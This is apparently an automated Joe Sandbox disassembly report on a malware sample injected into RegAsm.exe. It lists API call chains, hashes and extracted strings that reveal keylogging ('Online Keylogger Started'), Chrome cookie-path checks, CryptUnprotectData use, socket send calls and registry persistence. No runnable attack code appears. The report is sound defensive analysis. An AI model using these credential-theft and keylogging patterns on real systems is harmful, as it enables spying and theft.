                                                                                                                          • Associated: 0000000E.00000002.924918223.0000000010000000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                                                                          • Associated: 0000000E.00000002.924923884.0000000010016000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                          • Snapshot File: hcaresult_14_2_10000000_RegAsm.jbxd
                                                                                                                          Similarity
                                                                                                                          • API ID: ErrorLast$_free
                                                                                                                          • String ID:
                                                                                                                          • API String ID: 3170660625-0
                                                                                                                          • Opcode ID: 6445a1f563467e3e4669709244547b488691a64b9545451a4f80944232cffe94
                                                                                                                          • Instruction ID: a404960836b3e2f032ab47abdd1028028b52a365ddf0c47563f665e512f3cffd
                                                                                                                          • Opcode Fuzzy Hash: 6445a1f563467e3e4669709244547b488691a64b9545451a4f80944232cffe94
                                                                                                                          • Instruction Fuzzy Hash: 5501F47A108A52A7F202E7345C85E1F3AAEDBC55F37220025FD19A615EEF73FD024164
                                                                                                                          APIs
                                                                                                                          • lstrlenW.KERNEL32(?,?,?,?,?,100010DF,?,?,?,00000000), ref: 10001E9A
                                                                                                                          • lstrcatW.KERNEL32(?,?), ref: 10001EAC
                                                                                                                          • lstrlenW.KERNEL32(?,?,100010DF,?,?,?,00000000), ref: 10001EB3
                                                                                                                          • lstrlenW.KERNEL32(?,?,100010DF,?,?,?,00000000), ref: 10001EC8
                                                                                                                          • lstrcatW.KERNEL32(?,100010DF), ref: 10001ED3
                                                                                                                          Memory Dump Source
                                                                                                                          • Source File: 0000000E.00000002.924923884.0000000010001000.00000040.00001000.00020000.00000000.sdmp, Offset: 10000000, based on PE: true
                                                                                                                          • Associated: 0000000E.00000002.924918223.0000000010000000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                                                                          • Associated: 0000000E.00000002.924923884.0000000010016000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                          • Snapshot File: hcaresult_14_2_10000000_RegAsm.jbxd
                                                                                                                          Similarity
                                                                                                                          • API ID: lstrlen$lstrcat
                                                                                                                          • String ID:
                                                                                                                          • API String ID: 493641738-0
                                                                                                                          • Opcode ID: 15c5d9995ac510f09c0b88b7baf044722e7f40351600db373de5a6e0e33856fc
                                                                                                                          • Instruction ID: f5d9027fafc921fe84ae6627056796c55de3fa1ad923a59450c5185d8ca5453c
                                                                                                                          • Opcode Fuzzy Hash: 15c5d9995ac510f09c0b88b7baf044722e7f40351600db373de5a6e0e33856fc
                                                                                                                          • Instruction Fuzzy Hash: D8F082261002207AF621772AECC5FBF7B7CEFC6AA0F04001AFA0C83194DB54684292B5
                                                                                                                          APIs
                                                                                                                          • _free.LIBCMT ref: 00450A54
                                                                                                                            • Part of subcall function 00446802: HeapFree.KERNEL32(00000000,00000000), ref: 00446818
                                                                                                                            • Part of subcall function 00446802: GetLastError.KERNEL32(?,?,00450CEF,?,00000000,?,00000000,?,00450F93,?,00000007,?,?,004514DE,?,?), ref: 0044682A
                                                                                                                          • _free.LIBCMT ref: 00450A66
                                                                                                                          • _free.LIBCMT ref: 00450A78
                                                                                                                          • _free.LIBCMT ref: 00450A8A
                                                                                                                          • _free.LIBCMT ref: 00450A9C
                                                                                                                          Memory Dump Source
                                                                                                                          • Source File: 0000000E.00000002.923500657.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                          • Associated: 0000000E.00000002.923500657.0000000000474000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                          • Associated: 0000000E.00000002.923500657.0000000000478000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                          • Snapshot File: hcaresult_14_2_400000_RegAsm.jbxd
                                                                                                                          Yara matches
                                                                                                                          Similarity
                                                                                                                          • API ID: _free$ErrorFreeHeapLast
                                                                                                                          • String ID:
                                                                                                                          • API String ID: 776569668-0
                                                                                                                          • Opcode ID: 3215379f381551316c6ac489d477ac1f9e59373460363398d28d4bb450e902e5
                                                                                                                          • Instruction ID: 72fff71e7c38304dd33e0b5962bcef44c8ad6e5fbb3f6de42623dcf71f8de19c
                                                                                                                          • Opcode Fuzzy Hash: 3215379f381551316c6ac489d477ac1f9e59373460363398d28d4bb450e902e5
                                                                                                                          • Instruction Fuzzy Hash: F7F012765053006B9620EB5DE883C1773D9EA157117A68C1BF549DB652C778FCC0866C
                                                                                                                          APIs
                                                                                                                          • _free.LIBCMT ref: 100091D0
                                                                                                                            • Part of subcall function 1000571E: HeapFree.KERNEL32(00000000,00000000), ref: 10005734
                                                                                                                            • Part of subcall function 1000571E: GetLastError.KERNEL32(?,?,1000924F,?,00000000,?,00000000,?,10009276,?,00000007,?,?,10007E5A,?,?), ref: 10005746
                                                                                                                          • _free.LIBCMT ref: 100091E2
                                                                                                                          • _free.LIBCMT ref: 100091F4
                                                                                                                          • _free.LIBCMT ref: 10009206
                                                                                                                          • _free.LIBCMT ref: 10009218
                                                                                                                          Memory Dump Source
                                                                                                                          • Source File: 0000000E.00000002.924923884.0000000010001000.00000040.00001000.00020000.00000000.sdmp, Offset: 10000000, based on PE: true
                                                                                                                          • Associated: 0000000E.00000002.924918223.0000000010000000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                                                                          • Associated: 0000000E.00000002.924923884.0000000010016000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                          • Snapshot File: hcaresult_14_2_10000000_RegAsm.jbxd
                                                                                                                          Similarity
                                                                                                                          • API ID: _free$ErrorFreeHeapLast
                                                                                                                          • String ID:
                                                                                                                          • API String ID: 776569668-0
                                                                                                                          • Opcode ID: 531e654f2f11120a5df636ecca0a5618a09e043c7f3cd6e1a71cca3ab3857efc
                                                                                                                          • Instruction ID: a08e021c65853776c99c3fd86fadada58ae96d962e635c5153d22f52a77de1c5
                                                                                                                          • Opcode Fuzzy Hash: 531e654f2f11120a5df636ecca0a5618a09e043c7f3cd6e1a71cca3ab3857efc
                                                                                                                          • Instruction Fuzzy Hash: 77F06DB161C650ABE664DB58EAC6C4B7BEDFB003E13608805FC4DD7549CB31FC809A64
                                                                                                                          APIs
                                                                                                                          • _free.LIBCMT ref: 00444106
                                                                                                                            • Part of subcall function 00446802: HeapFree.KERNEL32(00000000,00000000), ref: 00446818
                                                                                                                            • Part of subcall function 00446802: GetLastError.KERNEL32(?,?,00450CEF,?,00000000,?,00000000,?,00450F93,?,00000007,?,?,004514DE,?,?), ref: 0044682A
                                                                                                                          • _free.LIBCMT ref: 00444118
                                                                                                                          • _free.LIBCMT ref: 0044412B
                                                                                                                          • _free.LIBCMT ref: 0044413C
                                                                                                                          • _free.LIBCMT ref: 0044414D
                                                                                                                          Memory Dump Source
                                                                                                                          • Source File: 0000000E.00000002.923500657.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                          • Associated: 0000000E.00000002.923500657.0000000000474000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                          • Associated: 0000000E.00000002.923500657.0000000000478000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                          • Snapshot File: hcaresult_14_2_400000_RegAsm.jbxd
                                                                                                                          Yara matches
                                                                                                                          Similarity
                                                                                                                          • API ID: _free$ErrorFreeHeapLast
                                                                                                                          • String ID:
                                                                                                                          • API String ID: 776569668-0
                                                                                                                          • Opcode ID: d22801927142449f45bafb541f3c6c05cfc56c6a25697691e9266b530bc09d46
                                                                                                                          • Instruction ID: 0e9c2896d1a2baf17e4b980eca3efa8a556ca0a6e45d827b59e8921ed08f8926
                                                                                                                          • Opcode Fuzzy Hash: d22801927142449f45bafb541f3c6c05cfc56c6a25697691e9266b530bc09d46
                                                                                                                          • Instruction Fuzzy Hash: 91F03AB18025208FA731AF2DBD528053BA1A705720356853BF40C62A71C7B849C2DFDF
                                                                                                                          APIs
                                                                                                                          • _free.LIBCMT ref: 1000536F
                                                                                                                            • Part of subcall function 1000571E: HeapFree.KERNEL32(00000000,00000000), ref: 10005734
                                                                                                                            • Part of subcall function 1000571E: GetLastError.KERNEL32(?,?,1000924F,?,00000000,?,00000000,?,10009276,?,00000007,?,?,10007E5A,?,?), ref: 10005746
                                                                                                                          • _free.LIBCMT ref: 10005381
                                                                                                                          • _free.LIBCMT ref: 10005394
                                                                                                                          • _free.LIBCMT ref: 100053A5
                                                                                                                          • _free.LIBCMT ref: 100053B6
                                                                                                                          Memory Dump Source
                                                                                                                          • Source File: 0000000E.00000002.924923884.0000000010001000.00000040.00001000.00020000.00000000.sdmp, Offset: 10000000, based on PE: true
                                                                                                                          • Associated: 0000000E.00000002.924918223.0000000010000000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                                                                          • Associated: 0000000E.00000002.924923884.0000000010016000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                          • Snapshot File: hcaresult_14_2_10000000_RegAsm.jbxd
                                                                                                                          Similarity
                                                                                                                          • API ID: _free$ErrorFreeHeapLast
                                                                                                                          • String ID:
                                                                                                                          • API String ID: 776569668-0
                                                                                                                          • Opcode ID: 77e2762e1a20340d72e45a4044f221924c2ac7473818ed27067cb432955df604
                                                                                                                          • Instruction ID: ba906e9feca9bc6e71cd1aa5ebacb8f64a9f241ffe6b13fedf7f16c4e4854dfa
                                                                                                                          • Opcode Fuzzy Hash: 77e2762e1a20340d72e45a4044f221924c2ac7473818ed27067cb432955df604
                                                                                                                          • Instruction Fuzzy Hash: 38F0F478C18934EBF741DF28ADC140A3BB5F718A91342C15AFC1497279DB36D9429B84
                                                                                                                          APIs
                                                                                                                          • _strpbrk.LIBCMT ref: 0044E7B8
                                                                                                                          • _free.LIBCMT ref: 0044E8D5
                                                                                                                            • Part of subcall function 0043BD68: IsProcessorFeaturePresent.KERNEL32(00000017), ref: 0043BD6A
                                                                                                                            • Part of subcall function 0043BD68: GetCurrentProcess.KERNEL32(C0000417,?,00405103), ref: 0043BD8C
                                                                                                                            • Part of subcall function 0043BD68: TerminateProcess.KERNEL32(00000000,?,00405103), ref: 0043BD93
                                                                                                                          Strings
                                                                                                                          Memory Dump Source
                                                                                                                          • Source File: 0000000E.00000002.923500657.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                          • Associated: 0000000E.00000002.923500657.0000000000474000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                          • Associated: 0000000E.00000002.923500657.0000000000478000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                          • Snapshot File: hcaresult_14_2_400000_RegAsm.jbxd
                                                                                                                          Yara matches
                                                                                                                          Similarity
                                                                                                                          • API ID: Process$CurrentFeaturePresentProcessorTerminate_free_strpbrk
                                                                                                                          • String ID: *?$.
                                                                                                                          • API String ID: 2812119850-3972193922
                                                                                                                          • Opcode ID: 425935087bf6a06ef5f668eca0c2840133b7cce1b1476d2e54c501535b2ee598
                                                                                                                          • Instruction ID: bbc13fc8ee10fdca904a4e9292213e09ebfa005f106ef5a16faeda3ce4fd08f7
                                                                                                                          • Opcode Fuzzy Hash: 425935087bf6a06ef5f668eca0c2840133b7cce1b1476d2e54c501535b2ee598
                                                                                                                          • Instruction Fuzzy Hash: C251B175E00209AFEF14DFAAC881AAEF7B5FF58314F24416EE844E7341E6399A018B54
                                                                                                                          APIs
                                                                                                                          • GetKeyboardLayoutNameA.USER32(?), ref: 00409F0E
                                                                                                                            • Part of subcall function 004048C8: connect.WS2_32(FFFFFFFF,02384988,00000010), ref: 004048E0
                                                                                                                            • Part of subcall function 0041C5A6: CreateFileW.KERNEL32(00000000,80000000,00000001,00000000,00000003,00000080,00000000), ref: 0041C5BB
                                                                                                                            • Part of subcall function 00404AA1: send.WS2_32(FFFFFFFF,00000000,00000000,00000000), ref: 00404B36
                                                                                                                          Strings
                                                                                                                          Memory Dump Source
                                                                                                                          • Source File: 0000000E.00000002.923500657.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                          • Associated: 0000000E.00000002.923500657.0000000000474000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                          • Associated: 0000000E.00000002.923500657.0000000000478000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                          • Snapshot File: hcaresult_14_2_400000_RegAsm.jbxd
                                                                                                                          Yara matches
                                                                                                                          Similarity
                                                                                                                          • API ID: CreateFileKeyboardLayoutNameconnectsend
                                                                                                                          • String ID: 02x$XQG$NG
                                                                                                                          • API String ID: 1634807452-462346994
                                                                                                                          • Opcode ID: 24d1b81352f2547fa77c554ed12819fcaf45bb034c36d1f1b2d86084d4bb2f97
                                                                                                                          • Instruction ID: 86122f73fea86c9dce3a8c8dcd7d10d1556e7c038dfd98f63e082762e027ad1b
                                                                                                                          • Opcode Fuzzy Hash: 24d1b81352f2547fa77c554ed12819fcaf45bb034c36d1f1b2d86084d4bb2f97
                                                                                                                          • Instruction Fuzzy Hash: 955120315082419BC328FB32D851AEFB3E5AFD4348F50493FF54AA71E2EF78594A8649
                                                                                                                          APIs
                                                                                                                          • GetModuleFileNameA.KERNEL32(00000000,C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe,00000104), ref: 00443515
                                                                                                                          • _free.LIBCMT ref: 004435E0
                                                                                                                          • _free.LIBCMT ref: 004435EA
                                                                                                                          Strings
                                                                                                                          Memory Dump Source
                                                                                                                          • Source File: 0000000E.00000002.923500657.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                          • Associated: 0000000E.00000002.923500657.0000000000474000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                          • Associated: 0000000E.00000002.923500657.0000000000478000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                          • Snapshot File: hcaresult_14_2_400000_RegAsm.jbxd
                                                                                                                          Yara matches
                                                                                                                          Similarity
                                                                                                                          • API ID: _free$FileModuleName
                                                                                                                          • String ID: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe
                                                                                                                          • API String ID: 2506810119-1068371695
                                                                                                                          • Opcode ID: 85df99244543f45e80e68b9da345e50485f416d8f0a3fa02bb076d818d98866e
                                                                                                                          • Instruction ID: e5efe6401a3e5f1db0e1141fbbc5a3d1caea7301f6195c2e8eaff0a3f5655f7e
                                                                                                                          • Opcode Fuzzy Hash: 85df99244543f45e80e68b9da345e50485f416d8f0a3fa02bb076d818d98866e
                                                                                                                          • Instruction Fuzzy Hash: D63193B1A00254BFEB21DF9A998199EBBF8EB84B15F10406BF40597311D6B88F41CB99
                                                                                                                          APIs
                                                                                                                          • GetModuleFileNameA.KERNEL32(00000000,C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe,00000104), ref: 10004C1D
                                                                                                                          • _free.LIBCMT ref: 10004CE8
                                                                                                                          • _free.LIBCMT ref: 10004CF2
                                                                                                                          Strings
                                                                                                                          Memory Dump Source
                                                                                                                          • Source File: 0000000E.00000002.924923884.0000000010001000.00000040.00001000.00020000.00000000.sdmp, Offset: 10000000, based on PE: true
                                                                                                                          • Associated: 0000000E.00000002.924918223.0000000010000000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                                                                          • Associated: 0000000E.00000002.924923884.0000000010016000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                          • Snapshot File: hcaresult_14_2_10000000_RegAsm.jbxd
                                                                                                                          Similarity
                                                                                                                          • API ID: _free$FileModuleName
                                                                                                                          • String ID: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe
                                                                                                                          • API String ID: 2506810119-1068371695
                                                                                                                          • Opcode ID: f4d765c9bb58478f6d614cb19d249666f691a76f34bd4fd838862d42c91d6eee
                                                                                                                          • Instruction ID: 12f2da1a58c9c923660241357757b5dddff340f6d61411cdc8d35d961f62cc7a
                                                                                                                          • Opcode Fuzzy Hash: f4d765c9bb58478f6d614cb19d249666f691a76f34bd4fd838862d42c91d6eee
                                                                                                                          • Instruction Fuzzy Hash: EB31A0B5A01258EFFB51CF99CC81D9EBBFCEB88390F12806AF80497215DA709E41CB54
                                                                                                                          APIs
                                                                                                                          • GetModuleFileNameW.KERNEL32(00000000,?,00000104), ref: 00404066
                                                                                                                            • Part of subcall function 0041BA09: GetCurrentProcessId.KERNEL32(00000000,63781986,00000000,?,?,?,?,00466478,0040D248,.vbs,?,?,?,?,?,004752F0), ref: 0041BA30
                                                                                                                            • Part of subcall function 004185A3: CloseHandle.KERNEL32(004040F5), ref: 004185B9
                                                                                                                            • Part of subcall function 004185A3: CloseHandle.KERNEL32(00465E84), ref: 004185C2
                                                                                                                            • Part of subcall function 0041C516: CreateFileW.KERNEL32(00000000,80000000,00000003,00000000,00000003,00000080,00000000), ref: 0041C52F
                                                                                                                          • Sleep.KERNEL32(000000FA,00465E84), ref: 00404138
                                                                                                                          Strings
                                                                                                                          Memory Dump Source
                                                                                                                          • Source File: 0000000E.00000002.923500657.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                          • Associated: 0000000E.00000002.923500657.0000000000474000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                          • Associated: 0000000E.00000002.923500657.0000000000478000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                          • Snapshot File: hcaresult_14_2_400000_RegAsm.jbxd
                                                                                                                          Yara matches
                                                                                                                          Similarity
                                                                                                                          • API ID: CloseFileHandle$CreateCurrentModuleNameProcessSleep
                                                                                                                          • String ID: /sort "Visit Time" /stext "$0NG
                                                                                                                          • API String ID: 368326130-3219657780
                                                                                                                          • Opcode ID: 87d770fe459356d938983b865b1cd302a3835d7c71cdc7891b93df328c2921e7
                                                                                                                          • Instruction ID: 7a7c83aa22bf4ff3424ba87d95d637a61540eed1193ecfb54830ab602693969f
                                                                                                                          • Opcode Fuzzy Hash: 87d770fe459356d938983b865b1cd302a3835d7c71cdc7891b93df328c2921e7
                                                                                                                          • Instruction Fuzzy Hash: 2C316371A0011956CB15FBA6DC569ED7375AF90308F00007FF60AB71E2EF785D49CA99
                                                                                                                          APIs
                                                                                                                          • _wcslen.LIBCMT ref: 00416330
                                                                                                                            • Part of subcall function 004138B2: RegCreateKeyA.ADVAPI32(80000001,00000000,004660B4), ref: 004138C0
                                                                                                                            • Part of subcall function 004138B2: RegSetValueExA.KERNEL32(004660B4,000000AF,00000000,00000004,00000001,00000004), ref: 004138DB
                                                                                                                            • Part of subcall function 004138B2: RegCloseKey.ADVAPI32(004660B4), ref: 004138E6
                                                                                                                            • Part of subcall function 00409E1F: _wcslen.LIBCMT ref: 00409E38
                                                                                                                          Strings
                                                                                                                          Memory Dump Source
                                                                                                                          • Source File: 0000000E.00000002.923500657.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                          • Associated: 0000000E.00000002.923500657.0000000000474000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                          • Associated: 0000000E.00000002.923500657.0000000000478000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                          • Snapshot File: hcaresult_14_2_400000_RegAsm.jbxd
                                                                                                                          Yara matches
                                                                                                                          Similarity
                                                                                                                          • API ID: _wcslen$CloseCreateValue
                                                                                                                          • String ID: !D@$02x$okmode
                                                                                                                          • API String ID: 3411444782-2004864595
                                                                                                                          • Opcode ID: 85a472a8ed9fba8d48a13707545644fa305d45b1f9b2fecff8dfdaf9ddb1d636
                                                                                                                          • Instruction ID: 097cdf197a66b89fefcd85ce8a19d7acc75244c7017ebd4eb32b8c3ef24b572d
                                                                                                                          • Opcode Fuzzy Hash: 85a472a8ed9fba8d48a13707545644fa305d45b1f9b2fecff8dfdaf9ddb1d636
                                                                                                                          • Instruction Fuzzy Hash: 1E11A571B442011BDA187B32D862BBD22969F84348F80843FF546AF2E2DFBD4C51975D
                                                                                                                          APIs
                                                                                                                            • Part of subcall function 0040C4FE: PathFileExistsW.SHLWAPI(00000000), ref: 0040C531
                                                                                                                          • PathFileExistsW.SHLWAPI(00000000), ref: 0040C658
                                                                                                                          • PathFileExistsW.SHLWAPI(00000000), ref: 0040C6C3
                                                                                                                          Strings
                                                                                                                          • User Data\Default\Network\Cookies, xrefs: 0040C63E
                                                                                                                          • User Data\Profile ?\Network\Cookies, xrefs: 0040C670
                                                                                                                          Memory Dump Source
                                                                                                                          • Source File: 0000000E.00000002.923500657.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                          • Associated: 0000000E.00000002.923500657.0000000000474000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                          • Associated: 0000000E.00000002.923500657.0000000000478000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                          • Snapshot File: hcaresult_14_2_400000_RegAsm.jbxd
                                                                                                                          Yara matches
                                                                                                                          Similarity
                                                                                                                          • API ID: ExistsFilePath
                                                                                                                          • String ID: User Data\Default\Network\Cookies$User Data\Profile ?\Network\Cookies
                                                                                                                          • API String ID: 1174141254-1980882731
                                                                                                                          • Opcode ID: d340a52fd8d1078a812560c7ffc03c5fafbdbc6e30ffa616e893859f76221ba6
                                                                                                                          • Instruction ID: a3c4a2fc075df05cc4efb8d324c4514c6f5a9a9113215be8183f294a60e8cc46
                                                                                                                          • Opcode Fuzzy Hash: d340a52fd8d1078a812560c7ffc03c5fafbdbc6e30ffa616e893859f76221ba6
                                                                                                                          • Instruction Fuzzy Hash: 0621E27190011A96CB14FBA2DC96DEEBB7CAE50319B40053FF506B31D2EF789946C6D8
                                                                                                                          APIs
                                                                                                                            • Part of subcall function 0040C561: PathFileExistsW.SHLWAPI(00000000), ref: 0040C594
                                                                                                                          • PathFileExistsW.SHLWAPI(00000000), ref: 0040C727
                                                                                                                          • PathFileExistsW.SHLWAPI(00000000), ref: 0040C792
                                                                                                                          Strings
                                                                                                                          • User Data\Default\Network\Cookies, xrefs: 0040C70D
                                                                                                                          • User Data\Profile ?\Network\Cookies, xrefs: 0040C73F
                                                                                                                          Memory Dump Source
                                                                                                                          • Source File: 0000000E.00000002.923500657.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                          • Associated: 0000000E.00000002.923500657.0000000000474000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                          • Associated: 0000000E.00000002.923500657.0000000000478000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                          • Snapshot File: hcaresult_14_2_400000_RegAsm.jbxd
                                                                                                                          Yara matches
                                                                                                                          Similarity
                                                                                                                          • API ID: ExistsFilePath
                                                                                                                          • String ID: User Data\Default\Network\Cookies$User Data\Profile ?\Network\Cookies
                                                                                                                          • API String ID: 1174141254-1980882731
                                                                                                                          • Opcode ID: a04e00169c7cbbbccb250a5240b13a8e35c904a89c0728d580383dd97c6ecba8
                                                                                                                          • Instruction ID: 531025beeaae0c5c42121d483a56170e39db3028f8febaf9efde6b64dfa31b71
                                                                                                                          • Opcode Fuzzy Hash: a04e00169c7cbbbccb250a5240b13a8e35c904a89c0728d580383dd97c6ecba8
                                                                                                                          • Instruction Fuzzy Hash: 4821127190011A96CB04F7A2DC96CEEBB78AE50359B40013FF506B31D2EF789946C6D8
                                                                                                                          APIs
                                                                                                                          • GetLocalTime.KERNEL32(?,?,00000000), ref: 0040B1AD
                                                                                                                          • wsprintfW.USER32 ref: 0040B22E
                                                                                                                            • Part of subcall function 0040A671: SetEvent.KERNEL32(?,?,?,0040B86A,?,?,?,?,?,00000000), ref: 0040A69D
                                                                                                                          Strings
                                                                                                                          Memory Dump Source
                                                                                                                          • Source File: 0000000E.00000002.923500657.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                          • Associated: 0000000E.00000002.923500657.0000000000474000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                          • Associated: 0000000E.00000002.923500657.0000000000478000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                          • Snapshot File: hcaresult_14_2_400000_RegAsm.jbxd
                                                                                                                          Yara matches
                                                                                                                          Similarity
                                                                                                                          • API ID: EventLocalTimewsprintf
                                                                                                                          • String ID: [%04i/%02i/%02i %02i:%02i:%02i $]
                                                                                                                          • API String ID: 1497725170-1359877963
                                                                                                                          • Opcode ID: 06c3bad099b03f5bfd1d77d0a6934743afda3855c33f854b134d7284dad7d650
                                                                                                                          • Instruction ID: 4bcbbea8953a56f0834a7592719eb704c83d71ae81c48fe005db4fd1b538d991
                                                                                                                          • Opcode Fuzzy Hash: 06c3bad099b03f5bfd1d77d0a6934743afda3855c33f854b134d7284dad7d650
                                                                                                                          • Instruction Fuzzy Hash: 88114272404118AACB19AB96EC55CFE77BCEE48315B00012FF506A61D1FF7C5A45C6AD
                                                                                                                          APIs
                                                                                                                            • Part of subcall function 0040B19F: GetLocalTime.KERNEL32(?,?,00000000), ref: 0040B1AD
                                                                                                                            • Part of subcall function 0040B19F: wsprintfW.USER32 ref: 0040B22E
                                                                                                                            • Part of subcall function 0041B580: GetLocalTime.KERNEL32(00000000), ref: 0041B59A
                                                                                                                          • CreateThread.KERNEL32(00000000,00000000,Function_0000A2A2,?,00000000,00000000), ref: 0040AFA9
                                                                                                                          • CreateThread.KERNEL32(00000000,00000000,Function_0000A2C4,?,00000000,00000000), ref: 0040AFB5
                                                                                                                          • CreateThread.KERNEL32(00000000,00000000,0040A2D0,?,00000000,00000000), ref: 0040AFC1
                                                                                                                          Strings
                                                                                                                          Memory Dump Source
                                                                                                                          • Source File: 0000000E.00000002.923500657.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                          • Associated: 0000000E.00000002.923500657.0000000000474000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                          • Associated: 0000000E.00000002.923500657.0000000000478000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                          • Snapshot File: hcaresult_14_2_400000_RegAsm.jbxd
                                                                                                                          Yara matches
                                                                                                                          Similarity
                                                                                                                          • API ID: CreateThread$LocalTime$wsprintf
                                                                                                                          • String ID: Online Keylogger Started
                                                                                                                          • API String ID: 112202259-1258561607
                                                                                                                          • Opcode ID: 365fe234e7c63b24606a5b5b17b3dee8777c5a3443b42bc0c5888d8fa6c2e7ce
                                                                                                                          • Instruction ID: 1fd114496b08e8c1d91a2f23279a740fccf8855fe00c80ef0b78f2cd7c44f0e8
                                                                                                                          • Opcode Fuzzy Hash: 365fe234e7c63b24606a5b5b17b3dee8777c5a3443b42bc0c5888d8fa6c2e7ce
                                                                                                                          • Instruction Fuzzy Hash: 2A01C4A07003193EE62076368C8BDBF7A6DCA91398F4004BFF641362C2E97D1C1586FA
                                                                                                                          APIs
                                                                                                                          • LoadLibraryA.KERNEL32(crypt32), ref: 00406ABD
                                                                                                                          • GetProcAddress.KERNEL32(00000000), ref: 00406AC4
                                                                                                                          Strings
                                                                                                                          Memory Dump Source
                                                                                                                          • Source File: 0000000E.00000002.923500657.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                          • Associated: 0000000E.00000002.923500657.0000000000474000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                          • Associated: 0000000E.00000002.923500657.0000000000478000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                          • Snapshot File: hcaresult_14_2_400000_RegAsm.jbxd
                                                                                                                          Yara matches
                                                                                                                          Similarity
                                                                                                                          • API ID: AddressLibraryLoadProc
                                                                                                                          • String ID: CryptUnprotectData$crypt32
                                                                                                                          • API String ID: 2574300362-2380590389
                                                                                                                          • Opcode ID: 905686a6130e311fdcec2a0cd22c75bab7e39712089f0cc697143e337071fc99
                                                                                                                          • Instruction ID: 59ed3cbb63f31e38ea488d6bd85f24bb9ff1ce5495ed4d1509158228521d53cd
                                                                                                                          • Opcode Fuzzy Hash: 905686a6130e311fdcec2a0cd22c75bab7e39712089f0cc697143e337071fc99
                                                                                                                          • Instruction Fuzzy Hash: 2C01B975604216BBCB18CFAD9D449AF7BB4AB45300B00417EE956E3381DA74E9008B95
                                                                                                                          APIs
                                                                                                                          • WaitForSingleObject.KERNEL32(?,000003E8,?,?,?,00405159), ref: 00405173
                                                                                                                          • CloseHandle.KERNEL32(?), ref: 004051CA
                                                                                                                          • SetEvent.KERNEL32(?), ref: 004051D9
                                                                                                                          Strings
                                                                                                                          Memory Dump Source
                                                                                                                          • Source File: 0000000E.00000002.923500657.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                          • Associated: 0000000E.00000002.923500657.0000000000474000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                          • Associated: 0000000E.00000002.923500657.0000000000478000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                          • Snapshot File: hcaresult_14_2_400000_RegAsm.jbxd
                                                                                                                          Yara matches
                                                                                                                          Similarity
